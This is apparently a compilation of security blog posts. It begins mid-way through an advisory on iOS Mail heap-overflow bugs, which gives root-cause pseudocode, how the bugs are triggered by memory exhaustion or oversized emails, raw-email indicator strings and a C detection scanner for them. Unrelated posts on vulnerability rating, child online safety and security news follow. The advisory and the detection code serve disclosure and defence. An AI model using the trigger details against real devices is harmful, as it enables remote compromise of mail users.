  • NSMutableData sets a threshold of 0x200000 bytes: if the data is bigger than 0x200000 bytes, it writes the data into a file and then uses the mmap system call to map the file into the process memory. The 0x200000 threshold is easily exceeded, so every time new data needs to be appended the file is re-mmap'ed, and both the file size and the mapping size keep growing.
  • The remapping is done inside -[MFMutableData _mapMutableData:], and that is where the vulnerability lies.

Pseudocode of the vulnerable function is below.

-[MFMutableData _mapMutableData:] calls MFMutableData__mapMutableData___block_invoke when the mmap system call fails:

-[MFMutableData _mapMutableData:]
  result = mmap(0LL, v8, v9, 2, v6, 0LL);
  if (result == -1) {                        // mmap failed
      result = (void *)MFMutableData__mapMutableData___block_invoke(&v21);   // fallback path
  }

The pseudo code of MFMutableData__mapMutableData___block_invoke is as follows; it allocates an 8-byte heap chunk and then replaces the data->bytes pointer with that allocation.

void MFMutableData__mapMutableData___block_invoke(__int64 data)
{
  __int64 result; // x0

  data->vm = 0;
  data->length = 0;
  data->capacity = 8; // Reset MFMutableData capacity to 8
  result = calloc(data->capacity, 1); // Allocate a new piece of memory, size of 8
  data->bytes = result; // replace the mapping memory pointer, which overwrites the -1 in case of mmap failure
  return result;
}

After the execution of -[MFMutableData _mapMutableData:], the process continues execution of -[MFMutableData appendBytes:length:], causing a heap overflow when copying data to the allocated memory.

-[MFMutableData appendBytes:length:]
  int length = [self length];
  bytes = self->bytes;
     bytes = [self _mapMutableData]; // when the backing file has to be (re)mapped; may now point at the 8-byte heap chunk
  copy_dst = bytes + length;
  platform_memmove(copy_dst, append_bytes, append_length); // copies append_length bytes regardless of the 8-byte capacity, causing an OOB write into a small heap chunk

append_length is the length of a chunk of data from the stream. Since MALLOC_NANO is a very predictable memory region, this vulnerability is exploitable.

An attacker doesn't need to drain every last bit of memory to make mmap fail, because mmap requires a contiguous memory region.

According to the man page of mmap, mmap fails when MAP_ANON was specified and insufficient memory was available.

The goal is to make mmap fail; ideally, a big enough email will make that happen inevitably. However, we believe the vulnerabilities can also be triggered using other tricks that exhaust the resources. Such tricks can be achieved through multi-part, RTF, and other formats; more on that later.
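
To make both failure paths concrete, here is an added example in C (not Apple's code and not from the ZecOps advisory): a small file-backed growable buffer whose fields play the same roles as the MFMutableData fields named above (bytes, length, capacity, a backing file). It shows the checks the pseudocode lacks: the ftruncate() result is checked before the capacity is trusted, a failed mmap() leaves no fake 8-byte capacity behind, and the append copies only within the capacity that is actually mapped. The names (mapped_buf, mapped_buf_append, demo_roundtrip, demo_ftruncate_failure), the 4096-byte initial size and the /tmp backing file are assumptions of this example.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed example: a growable byte buffer backed by a file mapping, with
 * the same fields the post names on MFMutableData (bytes/length/capacity and a
 * backing file), but with every failure path handled. Not Apple's code. */
typedef struct {
    int      fd;        /* backing file; -1 simulates a file that cannot be extended */
    uint8_t *bytes;     /* current mapping, NULL when nothing is mapped */
    size_t   length;    /* bytes in use */
    size_t   capacity;  /* bytes actually mapped; 0 whenever bytes == NULL */
} mapped_buf;

static void mapped_buf_init(mapped_buf *b, int fd) {
    b->fd = fd; b->bytes = NULL; b->length = 0; b->capacity = 0;
}

static void mapped_buf_free(mapped_buf *b) {
    if (b->bytes) munmap(b->bytes, b->capacity);
    if (b->fd != -1) close(b->fd);
    b->bytes = NULL; b->capacity = 0; b->length = 0; b->fd = -1;
}

/* Grow the backing file, then re-map it. This is the step _flushToDisk: and
 * _mapMutableData: got wrong: here capacity only changes after ftruncate()
 * and mmap() have both succeeded, so it never claims room that does not exist. */
static int mapped_buf_reserve(mapped_buf *b, size_t want) {
    if (want <= b->capacity) return 0;
    size_t newcap = b->capacity ? b->capacity : 4096;   /* assumed initial size */
    while (newcap < want) newcap *= 2;

    if (ftruncate(b->fd, (off_t)newcap) == -1)
        return -1;                       /* file not extended: capacity untouched */

    if (b->bytes) {                      /* drop the old, smaller mapping */
        if (munmap(b->bytes, b->capacity) == -1) return -1;
        b->bytes = NULL;
        b->capacity = 0;                 /* nothing is mapped now, and we say so */
    }
    void *p = mmap(NULL, newcap, PROT_READ | PROT_WRITE, MAP_SHARED, b->fd, 0);
    if (p == MAP_FAILED)
        return -1;                       /* no 8-byte fallback: bytes stays NULL */
    b->bytes = p;
    b->capacity = newcap;
    return 0;
}

/* The copy step. appendBytes: trusted append_length; here the copy is bounded
 * by the capacity the mapping really has, whatever reserve() reported. */
static int mapped_buf_append(mapped_buf *b, const void *src, size_t n) {
    if (n > SIZE_MAX - b->length) { errno = EOVERFLOW; return -1; }
    if (mapped_buf_reserve(b, b->length + n) == -1) return -1;
    if (b->bytes == NULL || b->capacity - b->length < n) { errno = ENOMEM; return -1; }
    memmove(b->bytes + b->length, src, n);
    b->length += n;
    return 0;
}

/* Round trip: two small chunks plus a 5000-byte chunk that forces a re-map.
 * Returns 0 on success, otherwise the number of the first failed check. */
static int demo_roundtrip(void) {
    char path[] = "/tmp/mapped_buf_XXXXXX";        /* constructed temp file */
    int fd = mkstemp(path);
    if (fd == -1) return 1;
    unlink(path);                                  /* keep only the descriptor */
    mapped_buf b; mapped_buf_init(&b, fd);
    static const char p1[] = "Subject: constructed sample\r\n";
    static const char p2[] = "first body chunk\r\n";
    static char big[5000];
    memset(big, 'A', sizeof big);
    int rc = 0;
    if (mapped_buf_append(&b, p1, sizeof p1 - 1) != 0)                rc = 2;
    else if (mapped_buf_append(&b, p2, sizeof p2 - 1) != 0)           rc = 3;
    else if (mapped_buf_append(&b, big, sizeof big) != 0)             rc = 4;
    else if (b.length != sizeof p1 - 1 + sizeof p2 - 1 + sizeof big)  rc = 5;
    else if (memcmp(b.bytes, p1, sizeof p1 - 1) != 0)                 rc = 6;
    else if (b.bytes[b.length - 1] != 'A' || b.capacity < b.length)   rc = 7;
    mapped_buf_free(&b);
    return rc;
}

/* Simulates the failing ftruncate() behind the first crash: with an invalid
 * descriptor the file cannot grow, so append must refuse and leave the buffer
 * untouched instead of reaching memmove(). Returns 0 when it behaves. */
static int demo_ftruncate_failure(void) {
    mapped_buf b; mapped_buf_init(&b, -1);
    int rc = mapped_buf_append(&b, "x", 1);
    return (rc == -1 && b.length == 0 && b.bytes == NULL) ? 0 : 1;
}

int main(void) {
    printf("roundtrip: %d\n", demo_roundtrip());
    printf("ftruncate failure handled: %d\n", demo_ftruncate_failure());
    return 0;
}
```

The design point is that capacity is a statement about memory that is really mapped, so it is updated last and reset to zero as soon as the old mapping is gone; an append that cannot be satisfied returns an error rather than copying into whatever the pointer happens to reference.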

Another important factor that can affect exploitability is the hardware specification:

  • iPhone 6 has 1GB
  • iPhone 7 has 2GB
  • iPhone X has 3GB

Older devices have less physical RAM and a smaller virtual memory space, so it is not necessary to drain every last bit of RAM to trigger this bug: mmap fails when it cannot find a contiguous region of the requested size in the available virtual memory space.

We have determined that macOS is not vulnerable to either vulnerability.

In iOS 12 the vulnerability is easier to trigger because the data streaming happens inside the same process as the default mail application (MobileMail), which handles many more resources that consume virtual memory space, especially UI rendering. In iOS 13, MobileMail hands data streaming to a background process named maild, which concentrates its resources on parsing the emails and so reduces the chance of the virtual memory space accidentally running out.

Remote Reproduction / POC

Since MobileMail/maild did not explicitly set a maximum email size, it is possible to set up a custom email server and send an email containing several GB of plain text. The iOS MIME/Message library chunks data into roughly 0x100000 bytes on average while streaming, so failing to download the entire email is fine.

Please note that this is just one example of how to trigger this vulnerability. Attackers do not need to send such email in-order to trigger this vulnerability, and other tricks with multi-part, RTF, or other formats may accomplish the same objective with a standard size email.

Indicators of Compromise

#   Type of indicator     Purpose                            IOC
1   String in raw email   Part of the malicious email sent   AAAAAAAA AND AAAAATEy AND EA\r\nAABI AND "$\x0e\xce\xa0\xd4\xc7\xcb\x08" AND T8hlGOo9 AND OKl2N\r\nC (updated)
3   String in raw email   Part of the malicious email sent   3r0TRZfh AND AAAAAAAAAAAAAAAA AND \x0041\x0041\x0041\x0041 (unicode AAAA) (updated)
4   String in raw email   Part of the malicious email sent   \n/s1Caa6 AND J1Ls9RWH
5   String in raw email   Part of the malicious email sent   ://44449
6   String in raw email   Part of the malicious email sent   ://84371
7   String in raw email   Part of the malicious email sent   ://87756
8   String in raw email   Part of the malicious email sent   ://94654
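
As an added example (not from the ZecOps advisory) of how the indicator table can be turned into a detection check, here is a C scanner that treats each row as a rule whose "AND" strings must all be present, byte for byte, in a raw message. The rule table is copied from the rows above; the sample messages and the function names ioc_scan_mask and contains are constructed for this example, and row 3 is left out because its "unicode AAAA" pattern has no stated byte encoding.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct { const char *p; size_t n; } needle;          /* one byte pattern */
typedef struct { int id; needle needles[7]; } ioc_rule;      /* all needles must hit */
#define N(s) { (s), sizeof(s) - 1 }
#define END  { NULL, 0 }

/* The raw-email indicators from the table, grouped by row number. A row matches
 * only when every one of its "AND" strings is present. Row 3 is omitted because
 * its "unicode AAAA" pattern needs an encoding the table does not state. */
static const ioc_rule RULES[] = {
    { 1, { N("AAAAAAAA"), N("AAAAATEy"), N("EA\r\nAABI"),
           N("$\x0e\xce\xa0\xd4\xc7\xcb\x08"), N("T8hlGOo9"), N("OKl2N\r\nC"), END } },
    { 4, { N("\n/s1Caa6"), N("J1Ls9RWH"), END } },
    { 5, { N("://44449"), END } },
    { 6, { N("://84371"), END } },
    { 7, { N("://87756"), END } },
    { 8, { N("://94654"), END } },
};

/* Byte-exact substring search (memmem is not ISO C), so the \r\n sequences and
 * the raw 0x0e/0xce... bytes of row 1 are compared as bytes, not as text. */
static int contains(const unsigned char *hay, size_t hlen, const needle *nd) {
    if (nd->n > hlen) return 0;
    for (size_t i = 0; i + nd->n <= hlen; i++)
        if (memcmp(hay + i, nd->p, nd->n) == 0) return 1;
    return 0;
}

/* Returns a bitmask of matching row numbers (bit k set <=> row k matched). */
static unsigned ioc_scan_mask(const void *msg, size_t len) {
    const unsigned char *hay = msg;
    unsigned mask = 0;
    for (size_t r = 0; r < sizeof RULES / sizeof RULES[0]; r++) {
        int all = 1;
        for (const needle *nd = RULES[r].needles; nd->p; nd++)
            if (!contains(hay, len, nd)) { all = 0; break; }
        if (all) mask |= 1u << RULES[r].id;
    }
    return mask;
}

/* Constructed raw messages: one carrying rows 1 and 5, one benign. */
static const char SAMPLE_HIT[] =
    "From: sender@example.invalid\r\nSubject: test\r\n\r\n"
    "AAAAAAAA" "AAAAATEy\r\n"                  /* both row-1 "A" strings */
    "EA\r\nAABI\r\n"
    "$\x0e\xce\xa0\xd4\xc7\xcb\x08\r\n"
    "T8hlGOo9 OKl2N\r\nC\r\n"
    "http://44449/\r\n";
static const char SAMPLE_CLEAN[] =
    "From: sender@example.invalid\r\nSubject: hello\r\n\r\nNothing unusual here.\r\n";

int main(void) {
    printf("hit sample rows mask:   0x%02x\n", ioc_scan_mask(SAMPLE_HIT, sizeof SAMPLE_HIT - 1));
    printf("clean sample rows mask: 0x%02x\n", ioc_scan_mask(SAMPLE_CLEAN, sizeof SAMPLE_CLEAN - 1));
    return 0;
}
```

Feed it the raw message bytes as stored by the mail server (before any charset decoding), since several of the strings contain control and high bytes that a text-mode search would normalize away.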


Apple patched both vulnerabilities in the iOS 13.4.5 beta, as can be seen in the following screenshot:

To mitigate these issues, use the latest beta available. If using a beta version is not possible, consider disabling the Mail application and using Outlook, Edison Mail, or Gmail, which are not vulnerable.

Disclosure timeline

  • February 19th 2020 – Suspected events reported to the Vendor under ZecOps responsible disclosure policy which allows immediate release for in-the-wild triggers
  • Ongoing communication between the affected vendor & ZecOps
  • March 23rd – ZecOps sent to the affected vendor a POC reproduction of the OOB Write vulnerability
  • March 25th – ZecOps shared a local POC for the OOB Write
  • March 31st – ZecOps confirmed a second vulnerability exists in the same area and the ability of a remote trigger (Remote Heap Overflow) – both vulnerabilities were triggered in the wild
  • March 31st – ZecOps shared a POC with the affected vendor for the remote heap-overflow vulnerability
  • April 7th – ZecOps shared a custom Mail Server to trigger the 0-click heap overflow vulnerability on iOS 13.4 / 13.4.1 easily by simply adding the username & password to Mail and downloading the emails
  • April 15/16th – Vendor patches both vulnerabilities in the publicly available beta
  • April 20th – We re-analyzed historical data and found additional evidence of triggers in the wild on VIPs and targeted personas. We sent an email notifying the vendor that we will have to release this threat advisory imminently in order to enable organizations to safeguard themselves, as attacker(s) will likely increase their activity significantly now that it’s patched in the beta
  • April 22nd – Public disclosure


Q: Was the first and/or the second vulnerability exploited in the wild?

A: The suspected emails triggered code paths of both vulnerabilities in the wild, however, we think the first vulnerability (OOB Write) was triggered accidentally, and the main goal was to trigger the second vulnerability (Remote Heap Overflow).

  1. We have seen multiple triggers on the same users across multiple continents. 
  2. We examined the suspicious strings & root cause (such as the 414141…41 events and most of the other events):
    1. We confirmed that this code path does not get triggered randomly.
    2. We confirmed that the register values did not originate from the targeted software or from the operating system.
    3. We confirmed it was not a red team exercise / POC test.
    4. We confirmed that the controlled pointers containing 414141…41, as well as other controlled memory, were part of the data sent via email to the victim’s device.
  3. We verified that the bugs were remotely exploitable & reproduced the trigger.
  4. We saw similarities between the patterns used against at least a couple of the victims by the same attacker.
  5. Where possible, we confirmed that the allocation size was intentional.
  6. Lastly, we verified that the suspicious emails were received and processed by the device: according to the stack trace, the email should have been on the device / mail server. Where possible, together with the victims, we verified that the emails were deleted.

Based on the above, together with other information, we surmise that these vulnerabilities were actively exploited in the wild.

Q: Does an attacker have to trigger the first vulnerability first in order to trigger the second one?

A: No. An attacker would likely target the second vulnerability.

Q: Why are you disclosing these bugs before a full patch is available?

A: It’s important to understand the following:

  • These bugs alone cannot cause harm to iOS users – since the attackers would require an additional infoleak bug & a kernel bug afterwards for full control over the targeted device.
  • Both bugs were already disclosed during the publicly available beta update. The attackers are already aware that the golden opportunity with MobileMail/maild is almost over and they will likely use the time until a patch is available to attack as many devices as possible. 
  • With very limited data we were able to see that at least six organizations were impacted by this vulnerability – and the potential abuse of this vulnerability is enormous. We are confident that a patch must be provided for such issues with public triggers ASAP. 

It is our obligation to the public, our customers, partners, and iOS users globally to disclose these issues so that people who are interested can protect themselves by applying the beta patch, or by stopping their use of Mail and temporarily switching to alternatives that are not vulnerable to these bugs.

We hope that with making this information public it will help to promote a faster patch.

Q: Can both vulnerabilities be triggered remotely?

A: The remote heap overflow has been proven to be triggerable remotely without any user interaction (aka ‘0-click’) on iOS 13. The OOB write can be triggered remotely with an additional vulnerability that allows calling an arbitrary selector, just like the one published by Google Project Zero here. Since we saw an in-the-wild trigger for the first vulnerability, it is possible, although we think it was done by mistake (see above).

Q: Do end users need to perform any action for the exploitation to succeed?

A: On iOS 13 – no. On iOS 12 – it requires the victim to click on an email.

If an attacker controls the mail server, the attack can be performed without any clicks on iOS 12 too.

Q: Since when has iOS been vulnerable to these bugs?

A: iOS is vulnerable to these bugs at least since iOS 6 (Sept’ 2012). We haven’t checked earlier versions.

Q: What can you do to mitigate the vulnerability?

A: The newly released beta update of 13.4.5 contains a patch for these vulnerabilities. If you cannot update to this version, consider using other mail applications instead of the Mail application until a GA patch is available.

Q: Does an attacker need to send a very large email (e.g. 1-3gb)  to trigger the vulnerability?

A: No. Attackers may use tricks in multi-part / RTF, etc in order to consume the memory in a similar way without sending a large email.

Q: Does the vulnerability require additional information to succeed? 

A: Yes, an attacker would need to leak an address from the memory in order to bypass ASLR. We did not focus on this vulnerability in our research.

Q: What does the vulnerability allow?

A: The vulnerability allows running remote code in the context of MobileMail (iOS 12) or maild (iOS 13). Successful exploitation of this vulnerability would allow the attacker to leak, modify, and delete emails. An additional kernel vulnerability would provide full device access; we suspect that these attackers had another vulnerability. It is currently under investigation.

Q: Would end users notice any abnormal behavior once either vulnerability is triggered / exploited?

A: Besides a temporary slowdown of mobile mail application, users should not observe any other anomalous behavior.

When the exploit fails on iOS 12 – users may notice a sudden crash of the Mail application.

On iOS 13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried out afterwards and deletes the email. In failed attacks, the emails sent by the attacker would show the message: "This message has no content." as seen in the following picture:

Q: If the attackers fail, can they retry the attack using the same vulnerability right after?

A: On iOS 13, attackers may try multiple times to infect the device silently and without user interaction. On iOS 12, an additional attempt would require the user to click on a newly received email from the attackers. The victim does not need to open an attachment; just viewing the email is sufficient to trigger the attack.

Q: Can the attackers delete the received email after it was processed by the device and triggered the vulnerability?

A: Yes

Q: Is MacOS vulnerable to these vulnerabilities too?

A: No


Getting Started With Tracking Hackers With HoneyBadger

Hello and welcome. My name is John Strand, and in this video, we’re going to talk a little bit about HoneyBadger. Now, in a number of other videos and a number of other things whenever you’re talking about attribution or cyber deception, you can focus on creating documents or elements that’ll beacon back and many […]

The post Getting Started With Tracking Hackers With HoneyBadger appeared first on Black Hills Information Security.

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Every information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest “branded” vulnerability on the news, it’s hard to know where to start.

The National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a score for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.

Figure 1: How Mandiant Rates Vulnerabilities

Assisting Patch Prioritization

We believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated ‘high’ and ‘critical’ compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting ‘critical’ and ‘high’ designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a ‘critical’ rating (Figure 3).

Figure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities

Figure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities

Mandiant Vulnerability Ratings Defined

Our rating system includes both an exploitation rating and a risk rating:

The Exploitation Rating is an indication of what is occurring in the wild.

Figure 4: Mandiant Exploitation Rating definitions

The Risk Rating is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.

Figure 5: Mandiant Risk Rating definitions

We intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.

For example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation—including by APT41—the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.

CVE-2019-19781 is a path traversal vulnerability of the Citrix Application Delivery Controller (ADC) 13.0 that when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromises of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored in hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second order effects of exploitation of this vulnerability could be severe.

We described widespread exploitation of CVE-2019-19781 in our blog post earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we observed APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.

Factors Considered in Ratings

Our vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.

Impact considerations help determine what impact exploitation of the vulnerability can have on a targeted system.

Impact Type | Impact Consideration
Exploitation Consequence | The result of successful exploitation, such as privilege escalation or remote code execution
Confidentiality Impact | The extent to which exploitation can compromise the confidentiality of data on the impacted system
Integrity Impact | The extent to which exploitation allows attackers to alter information in impacted systems
Availability Impact | The extent to which exploitation disrupts or restricts access to data or systems

Mitigating factors affect an attacker’s likelihood of successful exploitation.

Mitigating Factor | Mitigating Consideration
Exploitation Vector | What methods can be used to exploit the vulnerability?
Attacking Ease | How difficult is the exploit to use in practice?
Exploit Reliability | How consistently can the exploit execute and perform the intended malicious activity?
Access Vector | What type of access (i.e. local, adjacent network, or network) is required to successfully exploit the vulnerability?
Access Complexity | How difficult is it to gain the access needed for the vulnerability?
Authentication Requirements | Does the exploitation require authentication and, if so, what type of authentication?
Vulnerable Product Ubiquity | How commonly is the vulnerable product used in enterprise environments?
Product's Targeting Value | How attractive is the vulnerable software product or device to threat actors to target?
Vulnerable Configurations | Does exploitation require specific configurations, either default or non-standard?

Mandiant Vulnerability Rating System Applied

The following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.


Vulnerability | Description | NVD Rating | Mandiant Rating
CVE-2019-12650 | A command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges | High | Low
CVE-2019-5786 | A use after free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code | Medium | High

CVE-2019-12650 was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges – level 15 admin privileges – to exploit. Because this level of access should be quite limited in enterprise environments, we believe that it is unlikely attackers would be able to leverage this vulnerability as easily as others. There is no known exploitation of this vulnerability.

NVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequence of exploitation as denial of service, while we know of exploitation in the wild that results in remote code execution in the context of the renderer, which is a more serious outcome.

As demonstrated, factors such as the assessed ease of exploitation and the observation of exploitation in the wild may result in a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the privileges required to exploit it as well as the lack of observed exploitation. On the other hand, we rated CVE-2019-5786 as high risk due to the assessed severity, the ubiquity of the software, and confirmed exploitation.

In early 2019, Google reported that two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (a Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability and pushed it to users through Chrome’s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems (Windows, Mac OS, and Linux) and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public blog post and proof of concept exploit code that was released a few weeks later and subsequently incorporated into a Metasploit module.

The Future of Vulnerability Analysis Requires Algorithms and Human Intelligence

We expect the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.

Mandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.

Human curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone


Every day we discover (or stumble over) new ways of coping and connecting during this unique chapter in family life. Still, as every age group under your roof finds their favorite virtual play date and hangout apps, parents may need to add a few safety rails to make sure the fun stays fun.

IRL community resurfaces


While this health crisis is devastating in so many ways, it’s also put a spotlight on the many heartwarming ways to connect in real life (IRL). We’re placing teddy bears in our windows for solidarity, creating scavenger hunts for neighborhood kids, serenading shut-ins, publically supporting first responders, celebrating birthdays and graduations with drive-by parades, and so, so much more.

The ongoing infusion of true, human connection has softened the uncertainty. Still, kids of every age need to maintain an emotional connection with peers. Here are a few things to think about as kids of every age connect with friends online.

Pre-K and Elementary Virtual Play Dates

Since health experts have put restrictions on familiar fun for little ones such as playgrounds, sports leagues, sleepovers, playdates, and even visits with grandparents, parents are relaxing screen time rules and looking for ways to have virtual playdates. Free video tools such as FaceTime and Zoom are proving lifesavers for group art, play, and learning, as are safe websites for young ones and phone apps. (If you run out things to do, here’s a great list of fun to tap and great learning sites for every age group).

Keep Them Safe

  • Share online experiences with young children at all times. Sit with them to teach, monitor, and explain the context of new digital environments. Also, keep computers and phones in a common area.
  • Try to keep screen time brief. Even young kids can become too screen-reliant.
  • Maximize privacy settings on all devices and turn on safe mode or safe search on websites and apps.
  • Introduce concepts such as cyberbullying and strangers in age-appropriate language.
  • Start family security efforts early. Consider the benefits of filtering software, safe browsing, and encrypting your family’s digital activity with a Virtual Private Network (VPN).

Middle and High Schooler Virtual Hang Outs

While screen time has spiked, digital connection while homebound is also essential for tweens and teens, for both learning and peer relationships. Kids are finding their new virtual hangouts on social networks, group chats, and video games. They are also playing virtual board games using sites such as Pogo, Let’s Play Uno, and Zoom. Netflix Party has become a fun way to watch Netflix with groups of friends.

Keep Them Safe

  • At this age many kids own (or will soon own) a smartphone. With increased time online, you may want to review the basics, such as privacy and location settings. This includes gaming devices.
  • With increased internet use and most schools closed for the year, using parental control software and gaming security software can help parents reduce online risks for children of all ages.
  • Be aware of and talk about trending, risky digital behaviors, and challenges that can surface on apps such as TikTok, and WhatsApp.
  • Review and approve games and apps before they are downloaded and consider monitoring your children’s devices as well as social profiles and posts.
  • This age group is quick to jump on public Wi-Fi, which puts your family’s data at risk. Exploring a family VPN is critical for this age group.
  • Discuss the danger of connecting with strangers online. Also, discuss the risks of oversharing personal information and photos, even in seemingly private chats and texts. Don’t let boredom lead to bad choices.
  • Discuss cyberbullying and how to block and report accounts that express hateful, racist, or threatening behavior.
  • Coach your kids on using strong passwords and how to verify legitimate websites and identify online scams.

There’s nothing normal for families about this time, but there is something special. Grab it. Keep talking and laughing, especially on the hard days. Have a daily “heart check-in” with your teen if he or she seems to be isolating. Give one another space for topsy-turvy moods. And, don’t forget parents, before this is all over, be sure to nail that TikTok dance with your kids and share it with the world!

The post Keeping Virtual Play Dates, Hang Outs, and Video Chats Safe for Everyone appeared first on McAfee Blogs.

7 Common Questions about CPEs During COVID-19

Continuing professional education is an important component of PCI SSC Qualification. Staying up to date, even during the COVID-19 pandemic, with the latest knowledge, techniques, and insights helps support the Program Participant’s ability to effectively conduct the tasks and responsibilities associated with a PCI SSC Qualification.

Applicants Webinar: NICE Notice of Funding Opportunity (NOFO) – K12 Cybersecurity Outreach Program

The PowerPoint slides used during this webinar can be downloaded here.

Speakers:

  • Rodney Petersen, Director, National Initiative for Cybersecurity Education (NICE)
  • Davina Pruitt-Mentle, Lead for Academic Engagement, National Initiative for Cybersecurity Education (NICE)
  • Gilbert Castillo, Grants Officer, National Institute of Standards and Technology (NIST)

Synopsis: NIST recently announced funding on behalf of the National Initiative for Cybersecurity Education (NICE) for the NICE K12 Cybersecurity Education Outreach Program. NIST is soliciting applications from U.S.-located, non-Federal entities

Cyber News Rundown: Ransomware Wrecks Florida City


Florida City Sees Lasting Effects of Ransomware Attack

Nearly three weeks after the City of Jupiter, Florida suffered a ransomware attack that took many of their internal systems offline, the city has yet to return to normal. City officials announced they would be working to rebuild their systems from backups, rather than paying any ransom, and were able to get their main website up and running again, along with many essential services. The timing of the attack couldn’t have been worse, as most of the City’s staff were under lockdown and unable to access compromised machines in a quick and safe manner.

Hackers Breach San Francisco International Airport

Late last month, Russia-based hackers attempted to breach the internal networks of San Francisco International Airport using a simple injection script to obtain employee credentials. By forcing the use of the SMB file-sharing protocol, the hackers could quickly grab usernames and hashed passwords, which would then allow them to deploy any number of malicious payloads or access extremely sensitive information. Shortly after the attack was detected and subsequently ended, the IT staff issued a forced password reset for all staff in hopes of minimizing any further damage.

Critical Exploits Patched by Microsoft

Recently, Microsoft patched three zero-day exploits that could allow remote code execution, privilege escalation, and even the creation of new accounts with full OS permissions. Two of the patched flaws related to the Adobe Type Manager Library and were functional on multiple Windows® operating systems, but performed different tasks based on the environment in which they were deployed.

DDoS Suspect Arrested in Netherlands

Two Dutch government websites that were created to distribute information related to the COVID-19 pandemic fell victim to a DDoS attack for several hours. Dutch authorities, who have been heavily involved in many cybersecurity operations, have arrested at least one suspect and shut down 15 sites offering DDoS services. Hopefully, the shutdowns will help reduce the number of these types of attacks going forward.

RagnarLocker Takes Down Portuguese Energy

